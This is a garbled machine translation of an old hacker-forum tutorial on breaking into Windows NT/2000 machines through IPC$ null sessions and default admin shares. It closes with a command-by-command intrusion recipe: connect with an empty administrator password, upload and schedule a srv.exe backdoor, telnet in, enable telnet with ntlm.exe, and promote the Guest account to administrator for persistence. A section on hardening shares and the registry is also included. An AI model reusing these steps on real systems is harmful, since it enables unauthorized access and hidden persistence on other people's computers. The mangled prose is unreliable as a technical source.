I am talking about:
The article about IPC $ invading can be described as cow, and there is no shortage, and the attack step can even say that it has become a classic model, so no one is willing to take this into set out.
But though this, but I personally think that these articles are not detailed. For the first time I contact IPC $ rookie, simple Russen steps don't answer their confused (you just find a HACK forum to search. IPC, how much is it existing?
So I wrote this kind of solution, I want to make some easier confusion, it is easy to confuse the problem, let everyone don't always be in the same place! If you have done this post, please have questions, please reply right away!
What is IPC $
IPC $ (Internet Process Connection) is a resource shared "named pipe" (everyone says this), it is to make a named pipe that opens inter-process communication, you can get the corresponding permissions by verifying the username and password, in remote Manage your computer and view your computer's shared resource.
With IPC $, the connectors can even create an empty connection with the target host without the username and password (of course, the other machine must open IPC $ sharing, otherwise you can't connect), and use this empty connection, The connector can also get a list of users on the target host (but the responsible administrator will prohibit the export user list).
We are always talking about IPC $ vulnerability IPC $ vulnerability, in fact, IPC $ is not a true vulnerability, it is to facilitate administrator's remote management and open remote network login function, but also open the default sharing, ie all Logic disk (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $).
All of these, the original intention is to facilitate the management of the administrator, but the original intention does not necessarily have a good job, some don't have the heart (what is intention? I don't know, the pronoun is one) will take advantage of IPC $, access sharing Resources, export users list, and use some dictionary tools to perform password probing, hoped to achieve higher permissions, thereby achieving non-marketed purposes.
Square:
1) IPC connection is a remote network login function unique in Windows NT and above, which is equivalent to Telnet in UNIX, because IPC $ features need to use a lot of DLL functions in Windows NT, so you can't be in Windows 9.x. run.
That is to say, only NT / 2000 / XP can be established IPC $ connection, 98 / ME can't create IPC $ Connection (but some friends said to build an empty connection in 98, I don't know if it is true, but now 2003 Year, I suggest that 98 comrades change the system, 98 is not cool)
2) Even if the empty connection is not 100% can be established, if the other party closes IPC $ sharing, you still have no connection.
3) It is not to say that you can view the other party's list of users, as administrators can prohibit export users.
Three establishment of IPC $ Connection in Hack Attack
As mentioned above, even if you have established an empty connection, you can also get a lot of information (and this information is often essential), access part sharing, if you can have a certain one If the user is logged in, then you will get the corresponding permissions, obviously, if you log in as an administrator, 嘿嘿, don't have to say more, what u want, u can do !!
(Basically, you can summarize the target information, managing target processes and services, uploading Trojans and running, if it is 2000 Server, you can also consider opening the terminal service convenient control. How? Be a great!)
But you don't want to be too early, because the administrator's password is not so good, although there will be some silly administrators with empty passwords or mentally ministerable passwords, but this is a few, and now it is not previous, In the improvement of people's safety awareness, the administrators have also carefully, get the administrator's password will become harder and harder.
So in the future, your biggest possibility is to connect with minimal permissions, you will slowly discover IPC $ connection is not universal, even when the host does not turn on IPC $, you can't connect.
So I think that you don't think of the IPC $ invading as an ultimate weapon, don't think it's going to fight, it is like the passball in front of the football, rarely has a fatal effect, but it is indispensable. I think this is the meaning of IPC $ connected in the Hack invasion.
Four IPC $ with empty connection, 139,445 port, default sharing relationship
The relationship between the above four may be a problem with the rookie very confused, but most of the articles have not conducted special instructions. In fact, I understand that it is not very thorough, it is summed up in communication with everyone. (A good discussion The atmosphere BBS can be said to be a rookie paradise) 1) IPC $ with empty connections:
You don't need the username and password IPC $ connection, once you log in with a user or administrator (that is, IPC $ with a specific username and password), you can't be called empty connection.
Many people may have to ask, since I can be connected, then I will open it in the future, why also spend Jiu Niu two tigers to scan the weak password, huh, huh, the reason is mentioned before, when you log in When you don't have any permissions (very depressed), and when you log in with the user or administrator, you will have the corresponding permissions (who don't want to be permissions, so still old and old, don't be lazy) .
2) IPC $ with 139,445 port:
IPC $ Connection can be remotely logged in and access to default sharing; and 139 ports are enabled by NetBIOS protocols, we can implement access to shared file / printers through 139, 445 (Win2000) port, so general, IPC $ Connection It is supported by 139 or 445 ports.
3) IPC $ with default sharing
The default sharing is to facilitate administrator remote management and the default open share (you can of course turn off it), that is, all logical disks (C $, D $, E $ ...) and system catalog Winnt or Windows (admin $), We can implement access to these default sharing through IPC $ (provided that the other party does not turn off these default sharing)
The reason for the fifth IPC $
The following five reasons are more common:
1) Your system is not NT or more operating system;
2) The other party does not open IPC $ default sharing
3) The other party has not opened 139 or 445 port (puzzled firewall shield)
4) Your command input is incorrect (such as lack of space, etc.)
5) User name or password error (empty connection is of course, it doesn't matter)
In addition, you can also analyze the reason according to the returned error number:
Error number 5, refuse to access: It is very likely that the user you use is not administrator privileges, first improve the permissions;
Error number 51, Windows can't find network path: there is a problem with the network;
Error number 53, can not find the network path: IP address error; the target is not boot; the target LanmanServer service is not started; the target has a firewall (port filtering);
Error number 67, find the network name: Your LanmanWorkStation service is not started; the target deletes IPC $;
Error number 1219, provided credentials and existing credential sets: You have established an IPC $ with each other, please delete again.
Error number 1326, unknown username or error password: The reason is obvious;
Error number 1792, trying to log in, but the network login service is not started: The target Netlogon service is not started. (This event occurs in connection domain)
Error number 2242, this user's password has expired: the target has an account policy, enforces the change in periodic requirements.
Regarding IPC $, there is a more complex problem. In addition to the above reasons, there will be some other uncertain factors, and this person cannot be detailed, it depends on everyone to experience and experiment.
Six how to open the target IPC $ (this paragraph is from related articles)
First you need to get a shell that doesn't rely on IPC $, such as SQL CMD extensions, Telnet, Trojans, of course, this shell must be admin privilege, then you can use the shell to execute the NET Share IPC $ to open the target IPC $ . From above, IPC $ can use there much of use. Please confirm that the relevant services have been running. If you don't start it (don't know how to do it, please see the usage of the NET command), or if you don't work (such as a firewall, killing) It is recommended to give up.
Seven how to prevent IPC $ invading
1 Prohibition of empty connections (This operation does not prevent the establishment of the empty connection, leading from "Empty Fair in Win2000") first running regedit, find the following group [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / LSA] put restrictanonymous = DWORD key value is changed to: 00000001 (If set to 2, there are some problems that will happen, such as some Win services, etc.)
2 prohibit default sharing
1) Take out local shared resources
Run -cmd-Enter net Share
2) Delete Sharing (one input one)
NET Share IPC $ / Delete
Net Share Admin $ / Delete
NET Share C $ / Delete
NET Share D $ / Delete (if there is e, f, ... can continue to delete)
3) Stop Server service
NET STOP Server / Y (Restart after restarting)
4) Modify the registry
Run -Regedit
Server version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShareserver (DWORD) to: 00000000.
Pro version: Find the following primary key [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] change the key value of AutoShaRewks (DWORD) to: 00000000.
If the primary key mentioned above does not exist, you will be built (right-click-new-double-byte value) a primary and re-change key value.
3 Permanent Close IPC $ and the Default Sharing Related Service: LanmanServer is Server Services
Control Panel - Management Tool - Service - Find server service (right-click) - Property - General - Start Type - Disabled
4 Install the firewall (check related settings), or port filtering (filtered out 139, 445, etc.), or use the new version of the optimization master
5 Setting complex password to prevent passwords of IPC $
Eight related orders
1) Create an empty connection:
NET USE // IP / IPC $ "" / user: "" (must pay attention to: This line of commands contain 3 spaces)
2) Establish a non-air connection:
NET USE // IP / IPC $ "User Name" / User: "Password" (same with 3 spaces)
3) Mapping default sharing:
NET USE Z: // IP / C $ "Password" / user: "User Name" (you can map the other party's C drive to your own Z disk, other tray push)
If IPC $ has been established with the target, you can use IP drive letter $ access directly, the specific command NET USE Z: // IP / C $
4) Delete an IPC $ connection
NET USE // IP / IPC $ / DEL
5) Delete shared mapping
NET USE C: / DEL deletes the mapped C drive, other disk classes push
NET USE * / DEL deletes all, there will be prompt requirements to press Y confirmation
Nine classic intrusion mode
This invasion mode is too classic. Most IPC tutorials have introduced. I will also get it quoted. I am grateful to the original creator! (I don't know which senior)
1. C: /> NET USE //127.0.0.1/IPC $ "" / user: "adminTitrators"
This is the user name that is swept by "streamer" is administrators, the password is the IP address of "empty" (empty password? Wow, luck is good), if it is intended to attack, you can use such a command to 127.0. 0.1 Create a connection because the password is "empty", so the first quotation is not entered, and the back is the user name, enter the administrators, command to complete. 2. C: /> Copy Srv.exe //127.0.0.1/admin
Copy Srv.exe first, there is in the direction of the Tools directory ($ refer to the admin user's C: / WinNT / System32 /, you can also use C $, D $, meaning the C disk and D disk, See where you have to copy it.).
3. C: /> Net Time //127.0.0.1
In the date of date, the current time of 127.0.0.1 was 2002/3/19 11:00 am, and the command was successfully completed.
4. C: /> AT //127.0.0.1 11:05 srv.exe
Start SRV.exe with the AT command (the time set here is more than the host time, or how you start, huh, huh!)
5. C: /> NET TIME / / 127.0.0.1
Check it out again? If the current time of 127.0.0.1 is 2002/3/19 11:05 am, then prepare to start the following command.
6. C: /> Telnet 127.0.0.1 99
This will use the telnet command, pay attention to the port is 99. The Telnet default is the 23-port, but we use SRV to create a 99-port for us in the other party.
Although we can go on Telnet, SRV is a one-time, and then activated next time! So we intend to build a Telnet service! This is to use NTLM.
7.c: /> Copy ntlm.exe //127.0.0.1/admin
Use the copy command to upload NTLM.exe to the host (NTLM.exe is also in the "streamer" Tools directory).
8. C: / WinNT / System32> NTLM
Enter NTLM boot (here the C: / Winnt / System32 "refers to the other party, running NTLM actually running this program on the other computer). When "DONE" appears, it will be normal. Then use "Net Start Telnet" to open the Telnet service!
9. Telnet 127.0.0.1, then enter the username and password to enter the other party, the operation is just as simple as the operation on DOS! (And then do you want to do? What do you want to do, haha?
In order to prevent everyone, we will activate the Guest to the management group.
10. C: /> Net User Guest / Active: YES
Activate the other party guest user
11. C: /> NET User Guest 1234
Change the password of the GUEST to 1234, or password you want to set
12. C: /> Net localgroup administrators guest / add
Change the guest into administrator ^ _ ^ (if the admin password changes, the guest account has not changed, the next time we can use Guest to access this computer again)
Ten summary:
About IPC intrusion says so much, I feel that it is enough, if there is an inaccurate place, I hope to discuss with you.
